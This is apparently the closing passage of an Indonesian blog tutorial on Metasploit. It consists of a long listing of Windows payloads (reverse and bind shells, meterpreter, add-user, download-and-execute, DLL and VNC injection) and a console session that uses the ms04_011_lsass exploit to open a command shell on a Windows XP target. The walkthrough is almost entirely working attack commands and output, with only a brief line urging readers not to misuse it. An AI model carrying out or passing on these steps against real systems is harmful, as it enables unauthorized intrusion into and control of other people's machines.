generic/debug_trap/reverse_ipv6_tcp Generic x86 Debug Trap, Reverse TCP Stager (IPv6)

generic/debug_trap/reverse_nonx_tcp Generic x86 Debug Trap, Reverse TCP Stager (No NX Support)

generic/debug_trap/reverse_ord_tcp Generic x86 Debug Trap, Reverse Ordinal TCP Stager

generic/debug_trap/reverse_tcp Generic x86 Debug Trap, Reverse TCP Stager

generic/shell_bind_tcp Generic Command Shell, Bind TCP Inline

generic/shell_reverse_tcp Generic Command Shell, Reverse TCP Inline

windows/adduser Windows Execute net user /ADD

windows/adduser/bind_ipv6_tcp Windows Execute net user /ADD, Bind TCP Stager (IPv6)

windows/adduser/bind_nonx_tcp Windows Execute net user /ADD, Bind TCP Stager (No NX Support)

windows/adduser/bind_tcp Windows Execute net user /ADD, Bind TCP Stager

windows/adduser/reverse_http Windows Execute net user /ADD, PassiveX Reverse HTTP Tunneling Stager

windows/adduser/reverse_ipv6_tcp Windows Execute net user /ADD, Reverse TCP Stager (IPv6)

windows/adduser/reverse_nonx_tcp Windows Execute net user /ADD, Reverse TCP Stager (No NX Support)

windows/adduser/reverse_ord_tcp Windows Execute net user /ADD, Reverse Ordinal TCP Stager

windows/adduser/reverse_tcp Windows Execute net user /ADD, Reverse TCP Stager

windows/dllinject/bind_ipv6_tcp Windows Inject DLL, Bind TCP Stager (IPv6)

windows/dllinject/bind_nonx_tcp Windows Inject DLL, Bind TCP Stager (No NX Support)

windows/dllinject/bind_tcp Windows Inject DLL, Bind TCP Stager

windows/dllinject/reverse_http Windows Inject DLL, PassiveX Reverse HTTP Tunneling Stager

windows/dllinject/reverse_ipv6_tcp Windows Inject DLL, Reverse TCP Stager (IPv6)

windows/dllinject/reverse_nonx_tcp Windows Inject DLL, Reverse TCP Stager (No NX Support)

windows/dllinject/reverse_ord_tcp Windows Inject DLL, Reverse Ordinal TCP Stager

windows/dllinject/reverse_tcp Windows Inject DLL, Reverse TCP Stager

windows/download_exec Windows Executable Download and Execute

windows/download_exec/bind_ipv6_tcp Windows Executable Download and Execute, Bind TCP Stager (IPv6)

windows/download_exec/bind_nonx_tcp Windows Executable Download and Execute, Bind TCP Stager (No NX Support)

windows/download_exec/bind_tcp Windows Executable Download and Execute, Bind TCP Stager

windows/download_exec/reverse_http Windows Executable Download and Execute, PassiveX Reverse HTTP Tunneling Stager

windows/download_exec/reverse_ipv6_tcp Windows Executable Download and Execute, Reverse TCP Stager (IPv6)

windows/download_exec/reverse_nonx_tcp Windows Executable Download and Execute, Reverse TCP Stager (No NX Support)

windows/download_exec/reverse_ord_tcp Windows Executable Download and Execute, Reverse Ordinal TCP Stager

windows/download_exec/reverse_tcp Windows Executable Download and Execute, Reverse TCP Stager

windows/exec Windows Execute Command

windows/exec/bind_ipv6_tcp Windows Execute Command, Bind TCP Stager (IPv6)

windows/exec/bind_nonx_tcp Windows Execute Command, Bind TCP Stager (No NX Support)

windows/exec/bind_tcp Windows Execute Command, Bind TCP Stager

windows/exec/reverse_http Windows Execute Command, PassiveX Reverse HTTP Tunneling Stager

windows/exec/reverse_ipv6_tcp Windows Execute Command, Reverse TCP Stager (IPv6)

windows/exec/reverse_nonx_tcp Windows Execute Command, Reverse TCP Stager (No NX Support)

windows/exec/reverse_ord_tcp Windows Execute Command, Reverse Ordinal TCP Stager

windows/exec/reverse_tcp Windows Execute Command, Reverse TCP Stager

windows/meterpreter/bind_ipv6_tcp Windows Meterpreter, Bind TCP Stager (IPv6)

windows/meterpreter/bind_nonx_tcp Windows Meterpreter, Bind TCP Stager (No NX Support)

windows/meterpreter/bind_tcp Windows Meterpreter, Bind TCP Stager

windows/meterpreter/reverse_http Windows Meterpreter, PassiveX Reverse HTTP Tunneling Stager

windows/meterpreter/reverse_ipv6_tcp Windows Meterpreter, Reverse TCP Stager (IPv6)

windows/meterpreter/reverse_nonx_tcp Windows Meterpreter, Reverse TCP Stager (No NX Support)

windows/meterpreter/reverse_ord_tcp Windows Meterpreter, Reverse Ordinal TCP Stager

windows/meterpreter/reverse_tcp Windows Meterpreter, Reverse TCP Stager

windows/reflectivedllinject/bind_ipv6_tcp Reflective Dll Injection, Bind TCP Stager (IPv6)

windows/reflectivedllinject/bind_nonx_tcp Reflective Dll Injection, Bind TCP Stager (No NX Support)

windows/reflectivedllinject/bind_tcp Reflective Dll Injection, Bind TCP Stager

windows/reflectivedllinject/reverse_http Reflective Dll Injection, PassiveX Reverse HTTP Tunneling Stager

windows/reflectivedllinject/reverse_ipv6_tcp Reflective Dll Injection, Reverse TCP Stager (IPv6)

windows/reflectivedllinject/reverse_nonx_tcp Reflective Dll Injection, Reverse TCP Stager (No NX Support)

windows/reflectivedllinject/reverse_ord_tcp Reflective Dll Injection, Reverse Ordinal TCP Stager

windows/reflectivedllinject/reverse_tcp Reflective Dll Injection, Reverse TCP Stager

windows/reflectivemeterpreter/bind_ipv6_tcp Windows Meterpreter, Bind TCP Stager (IPv6)

windows/reflectivemeterpreter/bind_nonx_tcp Windows Meterpreter, Bind TCP Stager (No NX Support)

windows/reflectivemeterpreter/bind_tcp Windows Meterpreter, Bind TCP Stager

windows/reflectivemeterpreter/reverse_http Windows Meterpreter, PassiveX Reverse HTTP Tunneling Stager

windows/reflectivemeterpreter/reverse_ipv6_tcp Windows Meterpreter, Reverse TCP Stager (IPv6)

windows/reflectivemeterpreter/reverse_nonx_tcp Windows Meterpreter, Reverse TCP Stager (No NX Support)

windows/reflectivemeterpreter/reverse_ord_tcp Windows Meterpreter, Reverse Ordinal TCP Stager

windows/reflectivemeterpreter/reverse_tcp Windows Meterpreter, Reverse TCP Stager

windows/reflectivevncinject/bind_ipv6_tcp Reflective VNC Dll Injection, Bind TCP Stager (IPv6)

windows/reflectivevncinject/bind_nonx_tcp Reflective VNC Dll Injection, Bind TCP Stager (No NX Support)

windows/reflectivevncinject/bind_tcp Reflective VNC Dll Injection, Bind TCP Stager

windows/reflectivevncinject/reverse_http Reflective VNC Dll Injection, PassiveX Reverse HTTP Tunneling Stager

windows/reflectivevncinject/reverse_ipv6_tcp Reflective VNC Dll Injection, Reverse TCP Stager (IPv6)

windows/reflectivevncinject/reverse_nonx_tcp Reflective VNC Dll Injection, Reverse TCP Stager (No NX Support)

windows/reflectivevncinject/reverse_ord_tcp Reflective VNC Dll Injection, Reverse Ordinal TCP Stager

windows/reflectivevncinject/reverse_tcp Reflective VNC Dll Injection, Reverse TCP Stager

windows/shell/bind_ipv6_tcp Windows Command Shell, Bind TCP Stager (IPv6)

windows/shell/bind_nonx_tcp Windows Command Shell, Bind TCP Stager (No NX Support)

windows/shell/bind_tcp Windows Command Shell, Bind TCP Stager

windows/shell/reverse_http Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager

windows/shell/reverse_ipv6_tcp Windows Command Shell, Reverse TCP Stager (IPv6)

windows/shell/reverse_nonx_tcp Windows Command Shell, Reverse TCP Stager (No NX Support)

windows/shell/reverse_ord_tcp Windows Command Shell, Reverse Ordinal TCP Stager

windows/shell/reverse_tcp Windows Command Shell, Reverse TCP Stager

windows/shell_bind_tcp Windows Command Shell, Bind TCP Inline

windows/shell_bind_tcp_xpfw Windows Disable Windows ICF, Command Shell, Bind TCP Inline

windows/shell_reverse_tcp Windows Command Shell, Reverse TCP Inline

windows/upexec/bind_ipv6_tcp Windows Upload/Execute, Bind TCP Stager (IPv6)

windows/upexec/bind_nonx_tcp Windows Upload/Execute, Bind TCP Stager (No NX Support)

windows/upexec/bind_tcp Windows Upload/Execute, Bind TCP Stager

windows/upexec/reverse_http Windows Upload/Execute, PassiveX Reverse HTTP Tunneling Stager

windows/upexec/reverse_ipv6_tcp Windows Upload/Execute, Reverse TCP Stager (IPv6)

windows/upexec/reverse_nonx_tcp Windows Upload/Execute, Reverse TCP Stager (No NX Support)

windows/upexec/reverse_ord_tcp Windows Upload/Execute, Reverse Ordinal TCP Stager

windows/upexec/reverse_tcp Windows Upload/Execute, Reverse TCP Stager

windows/vncinject/bind_ipv6_tcp Windows VNC Inject, Bind TCP Stager (IPv6)

windows/vncinject/bind_nonx_tcp Windows VNC Inject, Bind TCP Stager (No NX Support)

windows/vncinject/bind_tcp Windows VNC Inject, Bind TCP Stager

windows/vncinject/reverse_http Windows VNC Inject, PassiveX Reverse HTTP Tunneling Stager

windows/vncinject/reverse_ipv6_tcp Windows VNC Inject, Reverse TCP Stager (IPv6)

windows/vncinject/reverse_nonx_tcp Windows VNC Inject, Reverse TCP Stager (No NX Support)

windows/vncinject/reverse_ord_tcp Windows VNC Inject, Reverse Ordinal TCP Stager

windows/vncinject/reverse_tcp Windows VNC Inject, Reverse TCP Stager

msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp

payload => generic/shell_bind_tcp

msf exploit(ms04_011_lsass) > set RHOST <IPtarget>

RHOST =>

msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8

00c04fd92ef5:0.0@ncacn_np: IPtarget[\lsarpc]...

[*] Bound to 3919286a-b10c-11d0-9ba8

00c04fd92ef5:0.0@ncacn_np: IPtarget [\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Command shell session 3 opened (IPtarget:445 -> IPtarget:80)
[*] The DCERPC service did not reply to our request

Active sessions

===============

Id Description Tunnel

-- ----------- ------

3 Command shell ……./…….

Belum selesai sampai disini….

Oke …… Setelah itu

msf exploit(ms04_011_lsass) > sessions -i 3

[*] Starting interaction with 3...

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


tu sdh ada di sistem punya target......


maaf penjelasan diatas kurang mendetail, semua tergantung dari seni pikiran anda

atas dasar keinginan yang kuat disertai dengan keyakinan penuh........ saya yakin anda akan mencapai apa yang

anda inginkan.... sekali lagi jangan disalah gunakan (gunakan metas buat keamanan sistem)


semua tutor yang sudah saya posting dah saya coba tenang aja.....

sampai jumpa pada postingan berikutnya.


Tidak ada komentar:

Posting Komentar

silakan bagi yang mau bertanya, senang hati saya akan menjawab... itupun kalau saya tau,